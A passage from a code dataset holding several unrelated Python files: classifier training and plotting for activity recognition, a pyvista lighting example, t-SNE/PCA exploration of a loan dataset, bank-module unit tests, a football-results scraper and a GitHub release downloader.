file2.close()\n print('Finished Importance Feature Selection MLP Training...')\n\n # Importance LSTM Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. 
Best test acc around 94% - 95.5%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(fc).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(fc).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0013, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-6)\n print('Start Importance Feature Selection LSTM training...')\n train_loss_LSTM_fc, train_acc_LSTM_fc, test_loss_LSTM_fc, test_acc_LSTM_fc,laying_acc_LSTM_fc,\\\n sitting_acc_LSTM_fc, standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc,\\\n walkingup_acc_LSTM_fc, test_prediction_LSTM_fc = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_import_x_loader, train_y_loader, test_import_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished Importance Feature Selection LSTM Training...')\n\n NUM_FEATURE = 400\n # MIFS MLP Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 91% - 95%.\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(mifs).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(mifs).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0015, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-1)\n print('Start MIFS MLP training...')\n train_loss_MLP_mifs, train_acc_MLP_mifs, test_loss_MLP_mifs, test_acc_MLP_mifs,\\\n laying_acc_MLP_mifs, sitting_acc_MLP_mifs, standing_acc_MLP_mifs, walking_acc_MLP_mifs, walkingdown_acc_MLP_mifs,\\\n walkingup_acc_MLP_mifs, test_prediction_MLP_mifs = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_mifs, train_y_loader, test_x_loader_mifs, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MIFS MLP Training...')\n\n # MIFS LSTM Classifier, 400 features. train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. 
Best test acc around 91% - 95%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(mifs).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(mifs).txt\", \"w\")\n file1.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n file2.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0015, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00075, betas=(0.9, 0.999), eps=1e-1)\n print('Start MIFS LSTM training...')\n train_loss_LSTM_mifs, train_acc_LSTM_mifs, test_loss_LSTM_mifs, test_acc_LSTM_mifs, laying_acc_LSTM_mifs,\\\n sitting_acc_LSTM_mifs, standing_acc_LSTM_mifs, walking_acc_LSTM_mifs, walkingdown_acc_LSTM_mifs,\\\n walkingup_acc_LSTM_mifs, test_prediction_LSTM_mifs = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_mifs, train_y_loader, test_x_loader_mifs, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MIFS LSTM Training...')\n\n # F-score MLP Classifier, 400 features, train 50 epochs, return train loss, test loss, train acc, test acc,\n # and test acc for each activity. Best test acc around 90% - 94%.\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(fscore).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(fscore).txt\", \"w\")\n file1.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n file2.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.002, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0005, betas=(0.9, 0.999), eps=1e-1)\n print('Start F-score MLP training...')\n train_loss_MLP_fscore, train_acc_MLP_fscore, test_loss_MLP_fscore, test_acc_MLP_fscore,\\\n laying_acc_MLP_fscore, sitting_acc_MLP_fscore, standing_acc_MLP_fscore, walking_acc_MLP_fscore, walkingdown_acc_MLP_fscore,\\\n walkingup_acc_MLP_fscore, test_prediction_MLP_fscore = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_fscore, train_y_loader, test_x_loader_fscore, test_y_loader)\n file1.close()\n file2.close()\n print('Finished F-score MLP Training...')\n\n # F-score LSTM Classifier, 400 features, train 50 epochs, return train loss, test loss, train acc, test acc,\n # and test acc for each activity. 
Best test acc around 91% - 95%.\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result(fscore).txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result(fscore).txt\", \"w\")\n file1.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n file2.write('Number of selected features: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.002, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00075, betas=(0.9, 0.999), eps=1e-1)\n print('Start F-score LSTM training...')\n train_loss_LSTM_fscore, train_acc_LSTM_fscore, test_loss_LSTM_fscore, test_acc_LSTM_fscore, laying_acc_LSTM_fscore,\\\n sitting_acc_LSTM_fscore, standing_acc_LSTM_fscore, walking_acc_LSTM_fscore, walkingdown_acc_LSTM_fscore,\\\n walkingup_acc_LSTM_fscore, test_prediction_LSTM_fscore = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader_fscore, train_y_loader, test_x_loader_fscore, test_y_loader)\n file1.close()\n file2.close()\n print('Finished F-score LSTM Training...')\n\n # plot figure\n print('Start Plotting...')\n file = open(\"index for best accuracy.txt\", 'w')\n file.write(\"index selected in MLP and LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_LSTM,\n test_loss_LSTM, train_acc_MLP, test_acc_MLP, train_acc_LSTM, test_acc_LSTM,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_LSTM, sitting_acc_LSTM,\n standing_acc_LSTM, walking_acc_LSTM, walkingdown_acc_LSTM, walkingup_acc_LSTM, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'Train LSTM', 'Test LSTM'], ['MLP', 'LSTM'])\n file.write(\"index selected in MLP and importance MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_fc,\n test_loss_MLP_fc, train_acc_MLP, test_acc_MLP, train_acc_MLP_fc, test_acc_MLP_fc,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_fc, sitting_acc_MLP_fc,\n standing_acc_MLP_fc, walking_acc_MLP_fc, walkingdown_acc_MLP_fc, walkingup_acc_MLP_fc, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'Importance Train MLP', 'Importance Test MLP'], ['MLP', 'Importance MLP'])\n file.write(\"index selected in LSTM and importance LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_fc,\n test_loss_LSTM_fc, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_fc, test_acc_LSTM_fc,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_fc, sitting_acc_LSTM_fc,\n standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc, walkingup_acc_LSTM_fc, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'Importance Train LSTM', 'Importance Test LSTM'], ['LSTM', 'Importance LSTM'])\n figurePlot(MAX_EPOCH, classes, train_loss_MLP_fc, test_loss_MLP_fc, train_loss_LSTM_fc,\n test_loss_LSTM_fc, train_acc_MLP_fc, test_acc_MLP_fc, train_acc_LSTM_fc, test_acc_LSTM_fc,\n laying_acc_MLP_fc, sitting_acc_MLP_fc, standing_acc_MLP_fc, walking_acc_MLP_fc,\n walkingdown_acc_MLP_fc, walkingup_acc_MLP_fc, laying_acc_LSTM_fc, sitting_acc_LSTM_fc,\n standing_acc_LSTM_fc, walking_acc_LSTM_fc, walkingdown_acc_LSTM_fc, walkingup_acc_LSTM_fc, file,\n ['Loss', 'Accuracy'], ['Importance Train MLP', 'Importance Test MLP', 'Importance 
Train LSTM', 'Importance Test LSTM'],\n ['Importance MLP', 'Importance LSTM'])\n file.write(\"index selected in MLP and MIFS MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_mifs,\n test_loss_MLP_mifs, train_acc_MLP, test_acc_MLP, train_acc_MLP_mifs, test_acc_MLP_mifs,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_mifs, sitting_acc_MLP_mifs,\n standing_acc_MLP_mifs, walking_acc_MLP_mifs, walkingdown_acc_MLP_mifs, walkingup_acc_MLP_mifs, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'MIFS Train MLP', 'MIFS Test MLP'], ['MLP', 'MIFS MLP'])\n file.write(\"index selected in LSTM and MIFS LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_mifs,\n test_loss_LSTM_mifs, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_mifs, test_acc_LSTM_mifs,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_mifs, sitting_acc_LSTM_mifs,\n standing_acc_LSTM_mifs, walking_acc_LSTM_mifs, walkingdown_acc_LSTM_mifs, walkingup_acc_LSTM_mifs, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'MIFS Train LSTM', 'MIFS Test LSTM'], ['LSTM', 'MIFS LSTM'])\n file.write(\"index selected in MLP and F-score MLP:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_MLP_fscore,\n test_loss_MLP_fscore, train_acc_MLP, test_acc_MLP, train_acc_MLP_fscore, test_acc_MLP_fscore,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_MLP_fscore, sitting_acc_MLP_fscore,\n standing_acc_MLP_fscore, walking_acc_MLP_fscore, walkingdown_acc_MLP_fscore, walkingup_acc_MLP_fscore, file,\n ['Loss', 'Accuracy'], ['Train MLP', 'Test MLP', 'F-score Train MLP', 'F-score Test MLP'], ['MLP', 'F-score MLP'])\n file.write(\"index selected in LSTM and F-score LSTM:\\n\")\n figurePlot(MAX_EPOCH, classes, train_loss_LSTM, test_loss_LSTM, train_loss_LSTM_fscore,\n test_loss_LSTM_fscore, train_acc_LSTM, test_acc_LSTM, train_acc_LSTM_fscore, test_acc_LSTM_fscore,\n laying_acc_LSTM, sitting_acc_LSTM, standing_acc_LSTM, walking_acc_LSTM,\n walkingdown_acc_LSTM, walkingup_acc_LSTM, laying_acc_LSTM_fscore, sitting_acc_LSTM_fscore,\n standing_acc_LSTM_fscore, walking_acc_LSTM_fscore, walkingdown_acc_LSTM_fscore, walkingup_acc_LSTM_fscore, file,\n ['Loss', 'Accuracy'], ['Train LSTM', 'Test LSTM', 'F-score Train LSTM', 'F-score Test LSTM'], ['LSTM', 'F-score LSTM'])\n file.close()\n print('Finished Plotting...')\n\n # plot confusion matrix\n print('Start confusion_matrix...')\n cfs1 = confusion_matrix(test_y, np.asarray(test_prediction_MLP))\n cfs2 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM))\n cfs3 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_fc))\n cfs4 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_fc))\n cfs5 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_mifs))\n cfs6 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_mifs))\n cfs7 = confusion_matrix(test_y, np.asarray(test_prediction_MLP_fscore))\n cfs8 = confusion_matrix(test_y, np.asarray(test_prediction_LSTM_fscore))\n PlotConfusionMatrix(cfs1, classes = classes, title = \"MLP Confusion Matrix Without Feature Selection\")\n PlotConfusionMatrix(cfs2, classes = classes, title = \"LSTM Confusion Matrix Without Feature Selection\")\n PlotConfusionMatrix(cfs3, classes = classes, title = \"MLP Confusion 
Matrix With Importance Feature Selection\")\n PlotConfusionMatrix(cfs4, classes = classes, title = \"LSTM Confusion Matrix With Importance Feature Selection\")\n PlotConfusionMatrix(cfs5, classes = classes, title = \"MLP Confusion Matrix With MIFS Feature Selection\")\n PlotConfusionMatrix(cfs6, classes = classes, title = \"LSTM Confusion Matrix With MIFS Feature Selection\")\n PlotConfusionMatrix(cfs7, classes = classes, title = \"MLP Confusion Matrix With F-score Feature Selection\")\n PlotConfusionMatrix(cfs8, classes = classes, title = \"LSTM Confusion Matrix With F-score Feature Selection\")\n print('Finished confusion_matrix...')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Project/human-activity-recognition-with-smartphones/CS535project/cs535finalproject.py","file_name":"cs535finalproject.py","file_ext":"py","file_size_in_byte":38649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379454365","text":"# Plot three cubes lit by two lights with different attenuation\n# profiles. The blue light has slower linear attenuation, the\n# green one has quadratic attenuation that makes it decay\n# faster. Note that there are no shadow effects included so each\n# box gets lit by both lights.\n#\nimport pyvista as pv\nplotter = pv.Plotter(lighting='none')\nfor offset in 1, 2.5, 4:\n _ = plotter.add_mesh(\n pv.Cube(center=(offset, offset, 0)), color='white'\n )\ncolors = ['b', 'g']\nall_attenuations = [(0, 0.1, 0), (0, 0, 0.1)]\ncenters = [(0, 1, 0), (1, 0, 0)]\nfor color, attenuation_constants, center in zip(\n colors, all_attenuations, centers\n):\n light = pv.Light(position=center, color=color)\n light.focal_point = (1 + center[0], 1 + center[1], 0)\n light.cone_angle = 90\n light.positional = True\n light.attenuation_values = attenuation_constants\n plotter.add_light(light)\nplotter.view_vector((-1, -1, 1))\nplotter.show()\n","sub_path":"version/0.39/api/core/_autosummary/pyvista-Light-attenuation_values-1.py","file_name":"pyvista-Light-attenuation_values-1.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160977208","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.4'\n# jupytext_version: 1.2.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport numpy as np\nimport os\n\nnp.random.seed(42)\n\n# %matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Ignore useless warnings\nimport warnings\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\n# +\nimport pandas as pd\npd.set_option('display.max_rows', 30)\n\nX_test = pd.read_csv(\"test_LTFS.csv\")\ntrain_df = pd.read_csv(\"train_LTFS.csv\")\n# -\n\ntrain_df.head()\n\n\ndef missing_values_table(df):\n # Total missing values\n mis_val = df.isnull().sum()\n \n # Percentage of missing values\n mis_val_percent = 100 * df.isnull().sum() / len(df)\n \n # Make a table with the results\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n \n # Rename the columns\n mis_val_table_ren_columns = mis_val_table.rename(\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n \n # Sort the table by percentage of missing descending\n mis_val_table_ren_columns = mis_val_table_ren_columns[\n 
mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n '% of Total Values', ascending=False).round(1)\n \n # Print some summary information\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\" \n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n \" columns that have missing values.\")\n \n # Return the dataframe with missing information\n return mis_val_table_ren_columns\n\n\nmissing_values_table(train_df)\n\ntrain_df.columns\n\ntrain_df['loan_default'].value_counts()\n\ny_train = train_df['loan_default']\n\n# drop the label column first, then drop the raw date-of-birth column from the features\nX_train = train_df.drop('loan_default', axis =1)\nX_train = X_train.drop('Date.of.Birth', axis = 1)\n\n\ndef _get_categorical_features(df):\n feats = [col for col in list(df.columns) if df[col].dtype == 'object']\n return feats\n\n\ndef _get_numerical_features(df, cat_list):\n feats = [col for col in list(df.columns) if col not in cat_list]\n return feats\n\n\ncat_feats = _get_categorical_features(X_train)\n\nnum_feats = _get_numerical_features(X_train, cat_feats)\n\ncat_feats\n\n\n\n\n\n\n\n\n\n# +\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import OneHotEncoder\n\nclass selector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self,X):\n return X[self.attribute_names].values\n \n\n\nnum_pipeline = Pipeline([\n ('selector', selector(num_feats)),\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('std_scaler', StandardScaler()),\n ])\n\ncat_pipeline = Pipeline([\n ('selector', selector(cat_feats)),\n ('imputer', SimpleImputer(strategy=\"most_frequent\")),\n ('cat_encoder', OneHotEncoder(sparse=False)),\n])\n\n# +\nfrom sklearn.pipeline import FeatureUnion\n\nfull_pipeline = FeatureUnion(transformer_list=[\n (\"num_pipeline\", num_pipeline),\n (\"cat_pipeline\", cat_pipeline),\n ])\n\n# +\nX_train_processed = full_pipeline.fit_transform(X_train)\nX_train_processed = pd.DataFrame(X_train_processed)\n\n\n\n\n# -\n\n\n\n\n\n# +\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nfrom matplotlib.pyplot import figure\nfigure(num=None, figsize=(15, 8), dpi=80, facecolor='w', edgecolor='k')\n\ntsne = TSNE(n_components=2, random_state=0)\ntransformed_data = tsne.fit_transform(X_train_processed[:500])\nk = np.array(transformed_data)\n\ncolors = ['red', 'green']\n\nplt.scatter(k[:, 0], k[:, 1], c=y_train[:500], zorder=10, s=2, cmap=matplotlib.colors.ListedColormap(colors))\n# -\n\nfrom sklearn.decomposition import PCA \npca = PCA(n_components = 2)\nX2D = pca.fit_transform(X_train_processed)\n\npca.explained_variance_ratio_\n\nfigure(num=None, figsize=(15, 8), dpi=80, facecolor='w', edgecolor='k')\ncolors = ['red', 'green']\nplt.scatter(X2D[:, 0], X2D[:, 1], c=y_train, zorder=10, s=2, cmap=matplotlib.colors.ListedColormap(colors))\n\npca = PCA()\npca.fit(X_train_processed)\ncumsum = np.cumsum(pca.explained_variance_ratio_) \nd = np.argmax(cumsum >= 0.95) + 1\n\nd\n\npca = PCA(n_components=0.95) \nX_reduced = 
pca.fit_transform(X_train_processed)\n\nX_train_processed\n\nX_train.to_csv(r'X_train.csv')\ny_train.to_csv(r'y_train.csv')\nX_train_processed.to_csv(r'X_train_processed.csv')\n\n\n","sub_path":"00_TSNA_PCA_plot.py","file_name":"00_TSNA_PCA_plot.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"40188510","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom pa.pa.bank import Banks\n\n\nclass TestConfig:\n DB = 'memory'\n\n\nclass TestBank(TestCase):\n\n @patch('pa.db.bank.BankDB.add')\n def test_add_bank(self, mock_add):\n banks = Banks(TestConfig)\n banks.add({\n 'bank_name': 'aa',\n 'bank_branch': 'aa',\n 'branch_address': 'a\\r\\nb\\r\\nc\\r\\n',\n 'timings': '',\n }, for_user='u1')\n\n mock_add.assert_called_with({\n 'bank_name': 'aa',\n 'bank_branch': 'aa',\n 'branch_address': 'a\\r\\nb\\r\\nc\\r\\n',\n 'timings': '',\n 'username': 'u1',\n })\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_banks(self, mock_get_all_banks):\n\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b3', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n expected_all_banks = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': ''},\n {'bank_name': 'b2', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': ''},\n {'bank_name': 'b3', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': ''},\n ]\n\n banks = Banks(TestConfig)\n all_banks = banks.get_all_banks(for_user='u1')\n self.assertEqual(expected_all_banks, all_banks)\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_bank_branch_names(self, mock_get_all_banks):\n\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n expected_all_bank_branch_names = {\n 'b1': ['br1', 'br2'],\n 'b2': ['br3'],\n }\n\n banks = Banks(TestConfig)\n all_bank_branch_names = banks.get_all_bank_branch_names(for_user='u1')\n self.assertEqual(expected_all_bank_branch_names, all_bank_branch_names)\n\n @patch('pa.db.bank.BankDB.get_all_banks')\n def test_get_all_branches_of_a_bank(self, mock_get_all_banks):\n mock_get_all_banks.return_value = [\n {'bank_name': 'b1', 'bank_branch': 'br1', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br3', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b1', 'bank_branch': 'br2', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n {'bank_name': 'b2', 'bank_branch': 'br4', 'branch_address': 'aa', 'timings': '', 'username': 'u1'},\n ]\n banks = Banks(TestConfig)\n branch_names = banks.get_all_branches_of_a_bank(bank_name='b1', for_user='u1')\n self.assertEqual(['br1', 'br2', 'br3'], branch_names)\n\n @patch('pa.db.bank.BankDB.delete_bank_branch')\n def test_delete_bank_branch(self, mock_delete_bank_branch):\n banks = Banks(TestConfig)\n banks.delete_bank_branch(bank_name='b1', bank_branch='br1', username='u1')\n 
mock_delete_bank_branch.assert_called_with(bank_name='b1', bank_branch='br1', username='u1')\n","sub_path":"test/pa/test_bank.py","file_name":"test_bank.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"372781511","text":"import string\r\n# file = open('channel//90052.txt')\r\n# contents = file.read()\r\n\r\n\r\ndef find_next_nothing(nothing_number):\r\n file = open(f'channel//{nothing_number}.txt')\r\n contents = file.read()\r\n nothing = \"\".join([character for character in contents if character not in string.printable[10::] + \" \"])\r\n print(nothing)\r\n return nothing\r\n\r\n\r\ntemp = find_next_nothing(90052)\r\nwhile True:\r\n temp = find_next_nothing(temp)\r\n print(temp)\r\n","sub_path":"reddit_daily/python_challenge.py","file_name":"python_challenge.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"354040052","text":"from lxml import html\nfrom requests import get\n\n\ndef reqKickerMatchday(_league, _season, _matchday):\n \"\"\"Request the appropriate html from kicker.de and return tree:\"\"\"\n\n URL = 'http://www.kicker.de/news/fussball/{0}/{1}/{2}/0/spieltag.html'\n\n if _league == 1:\n leagueURL = 'bundesliga/spieltag/1-bundesliga'\n elif _league == 2:\n leagueURL = '2bundesliga/spieltag/2-bundesliga'\n elif _league == 3:\n leagueURL = '/3liga/spieltag/3-liga'\n else:\n raise ValueError(\"1&2 Bundesliga + 3 Liga support only atm.\")\n\n page = get(URL.format(leagueURL, _season, str(_matchday)))\n tree = html.fromstring(page.content)\n return tree\n\n\ndef reqKickerMatches(_tree, _nGames):\n links = _tree.xpath(\"//a/@href\")\n matchdaylinks = []\n matchtrees = []\n for link in links:\n if \"spielanalyse\" in link:\n matchdaylinks.append(link)\n for m in range(_nGames):\n page = get('http://www.kicker.de/'+matchdaylinks[m])\n matchtrees.append(html.fromstring(page.content))\n return matchtrees\n\n\ndef genMatchID(_league, _season, _matchday, _game):\n ID = ''\n ID += str(_league)\n ID += _season[2:4]+_season[5:7]\n if _matchday < 10:\n ID += '0' + str(_matchday)\n else:\n ID += str(_matchday)\n if _game < 10:\n ID += '0' + str(_game)\n else:\n ID += str(_game)\n return ID\n\n\ndef genGoalID(_league, _season, _matchday, _game, _goal):\n if _goal < 10:\n gid = genMatchID(_league, _season, _matchday, _game) + '0' + str(_goal)\n else:\n gid = genMatchID(_league, _season, _matchday, _game) + str(_goal)\n return gid\n\nif __name__ == \"__main__\":\n print(genGoalID(1, '2014-15', 1, 1, 1))\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52128927","text":"#! /usr/bin/python\n\nimport os\nimport sys\nimport json\nimport zipfile\nfrom urllib.request import urlopen, urlretrieve\n\ndef getFromAPI(user, repo):\n\ttry:\n\t\treturn json.loads(urlopen(\"https://api.github.com/repos/%(user)s/%(repo)s/releases/latest\" % locals()).read().decode('utf-8'))\n\texcept Exception as e:\n\t\traise e\n\ndef downloadFile(url, name):\n\ttry:\n\t\t# Needs fixing =). 
Over 100%?? count * blockSize can overshoot totalSize on the final block, so clamp the percentage at 100.\n\t\tdef dlProgress(count, blockSize, totalSize):\n\t\t\tpercent = min(100, int(count * blockSize * 100 / totalSize))\n\t\t\tsys.stdout.write('\\r')\n\t\t\tsys.stdout.write(\"[%-20s] %d%%\" % ('='*(percent // 5), percent))\n\t\t\tsys.stdout.flush()\n\n\t\turlretrieve(url, name + '.zip', reporthook=dlProgress)\n\t\tprint('\\n')\n\t\tprint(\"Download done! Created file \" + name + '.zip (This will later be deleted).')\n\texcept Exception as e:\n\t\traise e\n\ndef extractZip(fileName):\n\ttry:\n\t\tzip_ref = zipfile.ZipFile(fileName, 'r')\n\t\tzip_ref.extractall()\n\t\tzip_ref.close()\n\texcept Exception as e:\n\t\traise e\n\nargs = sys.argv\nargs.remove(__file__)\n\nif (args != None):\n\tif (len(args) > 0):\n\t\tif (args[0]):\n\t\t\tuserName = args[0]\n\t\telse:\n\t\t\tuserName = input(\"GitHub username: \")\n\telse:\n\t\tuserName = input(\"GitHub username: \")\n\n\tif (len(args) > 1):\n\t\tif (args[1]):\n\t\t\trepository = args[1]\n\t\telse:\n\t\t\trepository = input(\"GitHub repo: \")\n\telse:\n\t\trepository = input(\"GitHub repo: \")\nelse:\n\tuserName = input(\"GitHub username: \")\n\trepository = input(\"GitHub repo: \")\n\nprint('\\n')\n\nprint(\"Started getting info from GitHub\")\nAPIVals = getFromAPI(userName, repository)\nfileName = APIVals['name']\n\nprint(\"Started downloading file\")\ndownloadFile(APIVals['zipball_url'], fileName)\n\nprint(\"Extracting zip file...\")\nextractZip(fileName + '.zip')\n\nprint(\"Removing temp files.\")\nos.remove(fileName + '.zip')","sub_path":"git-clone-release.py","file_name":"git-clone-release.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207138765","text":"\n\n#class header\nclass _SWEETHEART():\n\tdef __init__(self,): \n\t\tself.name = \"SWEETHEART\"\n\t\tself.definitions = [u'a boyfriend or girlfriend: ', u'used for talking to a person that you love, especially a child or person you have a romantic relationship with : ', u'a kind and generous person: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = 